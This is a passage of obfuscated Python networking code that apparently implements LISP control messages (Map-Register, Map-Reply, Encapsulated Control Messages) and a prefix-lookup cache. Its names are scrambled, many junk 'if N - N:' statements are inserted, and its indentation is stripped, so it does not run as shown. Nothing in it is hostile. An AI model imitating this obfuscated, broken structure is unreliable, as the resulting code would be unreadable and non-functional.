if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
if 11 - 11: iII111i
IIi11ii = ms . map_server
if ( lisp_decent_push_configured and IIi11ii . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
IIi11ii = copy . deepcopy ( IIi11ii )
IIi11ii . address = 0x7f000001
I11 = bold ( "Bootstrap" , False )
Oo = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( I11 , Oo ) )
if 60 - 60: I1ii11iIi11i / I1Ii111
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
if 69 - 69: iII111i % I1ii11iIi11i
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 19 - 19: IiII
if 35 - 35: OoOoOO00
if 18 - 18: II111iiii . OoOoOO00 + I1ii11iIi11i * oO0o + OoooooooOO
if 39 - 39: I1IiiI * ooOoO0o / i11iIiiIii - oO0o - oO0o + O0
if 73 - 73: OOooOOo
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if ( ms . ekey != None ) :
iiIio0o0 = ms . ekey . zfill ( 32 )
OoOooO = "0" * 8
iiIi = chacha . ChaCha ( iiIio0o0 , OoOooO , 20 ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + iiIi
oO0ooOOO = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( oO0ooOOO , ms . ekey_id ) )
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
IIIII1I11ii = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
IIIII1I11ii = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 39 - 39: OOooOOo . IiII + I1IiiI % iII111i - oO0o / OoO0O00
if 37 - 37: O0 % OoO0O00 + i11iIiiIii . O0 / OOooOOo
lprint ( "Send Map-Register to map-server {}{}{}" . format ( IIi11ii . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , IIIII1I11ii ) )
if 15 - 15: I1ii11iIi11i + oO0o
lisp_send ( lisp_sockets , IIi11ii , LISP_CTRL_PORT , packet )
return
if 99 - 99: oO0o - ooOoO0o - II111iiii * OoooooooOO / O0
if 57 - 57: iIii1I11I1II1 / IiII + OoO0O00 * oO0o + Ii1I
if 76 - 76: i11iIiiIii . OOooOOo / I11i * oO0o % iIii1I11I1II1 . ooOoO0o
if 75 - 75: O0 + I1IiiI
if 67 - 67: OoOoOO00 % OoooooooOO / OoO0O00 - OoO0O00 / O0
if 19 - 19: iIii1I11I1II1 / OOooOOo % I11i % I1IiiI / I1ii11iIi11i
if 73 - 73: II111iiii
if 26 - 26: II111iiii . iIii1I11I1II1 - I1Ii111 % OOooOOo
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
O0oo0OoO0oo = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 83 - 83: OOooOOo + OoooooooOO % I1Ii111 % IiII + i11iIiiIii
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 10 - 10: OoooooooOO . Ii1I % I1Ii111 + IiII
if 78 - 78: OoOoOO00 - oO0o . I1ii11iIi11i * i11iIiiIii
packet = lisp_control_packet_ipc ( packet , O0oo0OoO0oo , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 44 - 44: iIii1I11I1II1 * iII111i
if 32 - 32: OoOoOO00
if 65 - 65: iIii1I11I1II1 + iII111i
if 90 - 90: i11iIiiIii - Oo0Ooo
if 31 - 31: OoOoOO00 + OoOoOO00 + OoooooooOO % O0
if 14 - 14: i1IIi / OoooooooOO . I1IiiI * I1Ii111 + OoO0O00
if 45 - 45: OoooooooOO * I1Ii111
if 7 - 7: O0
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 42 - 42: o0oOOo0O0Ooo / Ii1I
if 31 - 31: OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 65 - 65: I1IiiI . ooOoO0o
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 60 - 60: ooOoO0o
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 47 - 47: i11iIiiIii
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
if 56 - 56: Ii1I . iII111i
if ( lisp_nat_traversal ) :
oooooO0oO0ooO = lisp_get_any_translated_port ( )
if ( oooooO0oO0ooO != None ) : inner_sport = oooooO0oO0ooO
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
III1iI1III1I1 = lisp_ecm ( inner_sport )
if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
III1iI1III1I1 . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
III1iI1III1I1 . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
III1iI1III1I1 . ddt = ddt
ooIiii = III1iI1III1I1 . encode ( packet , inner_source , inner_dest )
if ( ooIiii == None ) :
lprint ( "Could not encode ECM message" )
return
if 71 - 71: ooOoO0o
III1iI1III1I1 . print_ecm ( )
if 71 - 71: i1IIi - oO0o / ooOoO0o * Ii1I
packet = ooIiii + packet
if 28 - 28: II111iiii . IiII / iII111i + I1ii11iIi11i - ooOoO0o * iIii1I11I1II1
O0O0 = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( O0O0 ) )
IIi11ii = lisp_convert_4to6 ( O0O0 )
lisp_send ( lisp_sockets , IIi11ii , LISP_CTRL_PORT , packet )
return
if 53 - 53: Ii1I - Ii1I . Oo0Ooo . OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
if 77 - 77: ooOoO0o + I1ii11iIi11i * o0oOOo0O0Ooo / i1IIi * I11i
if 70 - 70: oO0o / iII111i * i1IIi / II111iiii / OoOoOO00 + oO0o
if 30 - 30: i1IIi - iII111i - i11iIiiIii . OoOoOO00 . o0oOOo0O0Ooo
if 74 - 74: i11iIiiIii / II111iiii
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 62 - 62: O0
if 63 - 63: Oo0Ooo + Oo0Ooo
if 48 - 48: Oo0Ooo * I1ii11iIi11i % II111iiii
if 42 - 42: I1Ii111 - ooOoO0o % o0oOOo0O0Ooo * I1IiiI . o0oOOo0O0Ooo
if 84 - 84: iIii1I11I1II1
if 39 - 39: Ii1I . II111iiii / I1IiiI
def byte_swap_64 ( address ) :
IiI = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 44 - 44: Ii1I / Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
return ( IiI )
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
if 50 - 50: IiII . i11iIiiIii % I11i
if 22 - 22: i1IIi - II111iiii - OoOoOO00 . iII111i
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if 34 - 34: iII111i . OoOoOO00
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
class lisp_cache_entries ( object ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 34 - 34: OoooooooOO / iII111i / O0
if 75 - 75: I11i % OOooOOo - OoO0O00 * I11i * IiII
if 11 - 11: I1ii11iIi11i . O0 - iII111i * IiII . i1IIi . iII111i
class lisp_cache ( object ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 82 - 82: i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
def cache_size ( self ) :
return ( self . cache_count )
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
iiii11I1 = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
iiii11I1 = prefix . mask_len
else :
iiii11I1 = prefix . mask_len + 48
if 97 - 97: I11i . ooOoO0o
if 87 - 87: oO0o / iIii1I11I1II1 - I11i + OoooooooOO
oooo = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
i1I1iiiI = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 79 - 79: I1ii11iIi11i * IiII . I1ii11iIi11i
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
i1iIii = prefix . addr_length ( ) * 2
IiI = lisp_hex_string ( prefix . address ) . zfill ( i1iIii )
else :
IiI = prefix . address
if 65 - 65: iII111i - Ii1I - II111iiii * O0 + I1ii11iIi11i . iIii1I11I1II1
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
i1I1iiiI = "8003"
IiI = prefix . address . print_geo ( )
else :
i1I1iiiI = ""
IiI = ""
if 76 - 76: OoO0O00 * ooOoO0o
if 32 - 32: O0 . oO0o * o0oOOo0O0Ooo . Ii1I + IiII
III = oooo + i1I1iiiI + IiI
return ( [ iiii11I1 , III ] )
if 98 - 98: iII111i . II111iiii % O0
if 43 - 43: OOooOOo % I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
iiii11I1 , III = self . build_key ( prefix )
if ( iiii11I1 not in self . cache ) :
self . cache [ iiii11I1 ] = lisp_cache_entries ( )
self . cache_sorted = self . sort_in_entry ( self . cache_sorted , iiii11I1 )
if 17 - 17: OoooooooOO - i1IIi * I11i
if ( III not in self . cache [ iiii11I1 ] . entries ) :
self . cache_count += 1
if 33 - 33: i1IIi . Oo0Ooo + I11i
self . cache [ iiii11I1 ] . entries [ III ] = entry
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if 78 - 78: I1Ii111 + I1Ii111
def lookup_cache ( self , prefix , exact ) :
i1IIiii1IiIII , III = self . build_key ( prefix )
if ( exact ) :
if ( i1IIiii1IiIII not in self . cache ) : return ( None )
if ( III not in self . cache [ i1IIiii1IiIII ] . entries ) : return ( None )
return ( self . cache [ i1IIiii1IiIII ] . entries [ III ] )
if 56 - 56: OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI + o0oOOo0O0Ooo % II111iiii + OOooOOo . OoooooooOO
III11i1 = None
for iiii11I1 in self . cache_sorted :
if ( i1IIiii1IiIII < iiii11I1 ) : return ( III11i1 )
for oo0O00OOOOO in list ( self . cache [ iiii11I1 ] . entries . values ( ) ) :
if ( prefix . is_more_specific ( oo0O00OOOOO . eid ) ) :
if ( III11i1 == None or
oo0O00OOOOO . eid . is_more_specific ( III11i1 . eid ) ) : III11i1 = oo0O00OOOOO
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . ooOoO0o % O0
if 35 - 35: ooOoO0o - i1IIi
if 11 - 11: Oo0Ooo + oO0o / I1ii11iIi11i / OoOoOO00
return ( III11i1 )
if 49 - 49: Ii1I * I1ii11iIi11i
if 66 - 66: ooOoO0o
def delete_cache ( self , prefix ) :
iiii11I1 , III = self . build_key ( prefix )
if ( iiii11I1 not in self . cache ) : return
if ( III not in self . cache [ iiii11I1 ] . entries ) : return
self . cache [ iiii11I1 ] . entries . pop ( III )
self . cache_count -= 1
if 2 - 2: o0oOOo0O0Ooo
if 86 - 86: OoooooooOO * I1ii11iIi11i + O0 + o0oOOo0O0Ooo + OOooOOo % OoO0O00
def walk_cache ( self , function , parms ) :
for iiii11I1 in self . cache_sorted :
for oo0O00OOOOO in list ( self . cache [ iiii11I1 ] . entries . values ( ) ) :
o0o0O0O0Oooo0 , parms = function ( oo0O00OOOOO , parms )
if ( o0o0O0O0Oooo0 == False ) : return ( parms )
if 34 - 34: I1IiiI + i1IIi . II111iiii . O0
if 86 - 86: oO0o . OoOoOO00 - I11i . OOooOOo % OoO0O00
return ( parms )
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
def sort_in_entry ( self , table , value ) :
if ( table == [ ] ) : return ( [ value ] )
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
IIiIIiiiiI = table
while ( True ) :
if ( len ( IIiIIiiiiI ) == 1 ) :
if ( value == IIiIIiiiiI [ 0 ] ) : return ( table )
OOOooo0OooOoO = table . index ( IIiIIiiiiI [ 0 ] )
if ( value < IIiIIiiiiI [ 0 ] ) :
return ( table [ 0 : OOOooo0OooOoO ] + [ value ] + table [ OOOooo0OooOoO : : ] )
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
if ( value > IIiIIiiiiI [ 0 ] ) :
return ( table [ 0 : OOOooo0OooOoO + 1 ] + [ value ] + table [ OOOooo0OooOoO + 1 : : ] )
if 9 - 9: iIii1I11I1II1
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
OOOooo0OooOoO = old_div ( len ( IIiIIiiiiI ) , 2 )
IIiIIiiiiI = IIiIIiiiiI [ 0 : OOOooo0OooOoO ] if ( value < IIiIIiiiiI [ OOOooo0OooOoO ] ) else IIiIIiiiiI [ OOOooo0OooOoO : : ]
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
if 7 - 7: OoO0O00 - I11i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + i11iIiiIii
return ( [ ] )
if 28 - 28: OoOoOO00 % ooOoO0o . I1IiiI + II111iiii
if 34 - 34: iIii1I11I1II1
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 65 - 65: II111iiii - iII111i / o0oOOo0O0Ooo
for iiii11I1 in self . cache_sorted :
for III in self . cache [ iiii11I1 ] . entries :
oo0O00OOOOO = self . cache [ iiii11I1 ] . entries [ III ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( iiii11I1 , III ,
oo0O00OOOOO ) )
if 35 - 35: i11iIiiIii - Oo0Ooo . I1ii11iIi11i % OoOoOO00
if 20 - 20: OoO0O00
if 93 - 93: ooOoO0o + o0oOOo0O0Ooo - I1ii11iIi11i
if 56 - 56: Ii1I / Oo0Ooo
if 96 - 96: o0oOOo0O0Ooo . II111iiii
if 14 - 14: OoooooooOO - i1IIi / i11iIiiIii - OOooOOo - i11iIiiIii . ooOoO0o
if 8 - 8: oO0o * O0 - II111iiii + I1IiiI
if 85 - 85: OoooooooOO % i11iIiiIii / IiII % OoOoOO00 + O0
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 6 - 6: OoooooooOO
if 97 - 97: II111iiii + o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
if 14 - 14: OOooOOo * IiII
def lisp_map_cache_lookup ( source , dest ) :
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
II1OO0Oo0oOOO000 = dest . is_multicast_address ( )
if 33 - 33: OoO0O00
if 91 - 91: I11i % I11i % iII111i
if 19 - 19: I11i / I11i + I1IiiI * OoO0O00 - iII111i . Oo0Ooo
if 76 - 76: iII111i % OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % i1IIi
I11iiI1III = lisp_map_cache . lookup_cache ( dest , False )
if ( I11iiI1III == None ) :
i1iiii = source . print_sg ( dest ) if II1OO0Oo0oOOO000 else dest . print_address ( )
i1iiii = green ( i1iiii , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( i1iiii ) )
return ( None )
if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
if 18 - 18: OoooooooOO + ooOoO0o * OoOoOO00 - OoO0O00
if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
if 74 - 74: OoO0O00 - II111iiii - ooOoO0o % i1IIi
if ( II1OO0Oo0oOOO000 == False ) :
IiIIIIi11ii = green ( I11iiI1III . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , IiIIIIi11ii ) )
if 42 - 42: i11iIiiIii / O0
return ( I11iiI1III )
if 8 - 8: I1Ii111
if 51 - 51: i11iIiiIii
if 1 - 1: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i
if 58 - 58: i11iIiiIii * i11iIiiIii - OoO0O00
if 8 - 8: i11iIiiIii * OoOoOO00 . o0oOOo0O0Ooo
I11iiI1III = I11iiI1III . lookup_source_cache ( source , False )
if ( I11iiI1III == None ) :
i1iiii = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( i1iiii ) )
return ( None )
if 27 - 27: I1ii11iIi11i + Ii1I % I1Ii111
if 20 - 20: Oo0Ooo
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
if 2 - 2: OoooooooOO + IiII / iII111i . iIii1I11I1II1 * OoOoOO00
if 84 - 84: OOooOOo
IiIIIIi11ii = green ( I11iiI1III . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , IiIIIIi11ii ) )
if 68 - 68: I1Ii111
return ( I11iiI1III )
if 92 - 92: oO0o * Ii1I / OoO0O00 % II111iiii
if 54 - 54: oO0o + I11i - OoO0O00
if 86 - 86: OoooooooOO
if 51 - 51: i11iIiiIii
if 91 - 91: OOooOOo
if 22 - 22: OoooooooOO + OoOoOO00 - Ii1I . iII111i / OoooooooOO / I1IiiI
if 73 - 73: i1IIi - Ii1I + oO0o * iIii1I11I1II1
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
O0oO0 = lisp_referral_cache . lookup_cache ( eid , exact )
return ( O0oO0 )
if 100 - 100: i11iIiiIii / iIii1I11I1II1 + Oo0Ooo + OoO0O00 - iII111i
if 8 - 8: i11iIiiIii . O0 + o0oOOo0O0Ooo * oO0o + II111iiii
if 61 - 61: ooOoO0o / ooOoO0o
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 93 - 93: iIii1I11I1II1 % OoooooooOO
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
O0oO0 = lisp_referral_cache . lookup_cache ( group , exact )
if ( O0oO0 == None ) : return ( None )
if 87 - 87: iII111i
o000oOoO = O0oO0 . lookup_source_cache ( eid , exact )
if ( o000oOoO ) : return ( o000oOoO )
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if ( exact ) : O0oO0 = None
return ( O0oO0 )
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
o0O0o0OOOoO = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( o0O0o0OOOoO )
if 91 - 91: I1Ii111 * iII111i * OoO0O00
if 79 - 79: iII111i + oO0o
if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if ( eid . is_null ( ) ) : return ( None )
if 10 - 10: OOooOOo * OoooooooOO
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
o0O0o0OOOoO = lisp_ddt_cache . lookup_cache ( group , exact )
if ( o0O0o0OOOoO == None ) : return ( None )
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
oOOo0OOo00 = o0O0o0OOOoO . lookup_source_cache ( eid , exact )
if ( oOOo0OOo00 ) : return ( oOOo0OOo00 )
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if ( exact ) : o0O0o0OOOoO = None
return ( o0O0o0OOOoO )
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
if 66 - 66: iII111i + i1IIi
if 24 - 24: O0 / OoooooooOO - OoOoOO00
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
if 53 - 53: i11iIiiIii % I1ii11iIi11i
def lisp_site_eid_lookup ( eid , group , exact ) :
if 59 - 59: OOooOOo
if ( group . is_null ( ) ) :
i1iI11i = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( i1iI11i )
if 61 - 61: OoooooooOO + O0 - i1IIi % oO0o / I1ii11iIi11i
if 50 - 50: oO0o + II111iiii * OoOoOO00 % OoO0O00 . II111iiii % o0oOOo0O0Ooo
if 32 - 32: i1IIi / Ii1I + i11iIiiIii % oO0o
if 11 - 11: Ii1I - ooOoO0o % i11iIiiIii / OoooooooOO - O0 - IiII
if 25 - 25: IiII + O0 + oO0o % iIii1I11I1II1 - II111iiii . I1IiiI
if ( eid . is_null ( ) ) : return ( None )
if 62 - 62: IiII . O0 + oO0o - ooOoO0o * iIii1I11I1II1
if 8 - 8: I1ii11iIi11i
if 65 - 65: i11iIiiIii
if 92 - 92: oO0o * II111iiii + I1Ii111
if 49 - 49: II111iiii * I1IiiI * O0 / ooOoO0o * IiII
if 94 - 94: OoO0O00 - I1IiiI * oO0o
i1iI11i = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( i1iI11i == None ) : return ( None )
if 35 - 35: OOooOOo / i1IIi + OoO0O00
if 31 - 31: OoO0O00 . i1IIi / OoooooooOO
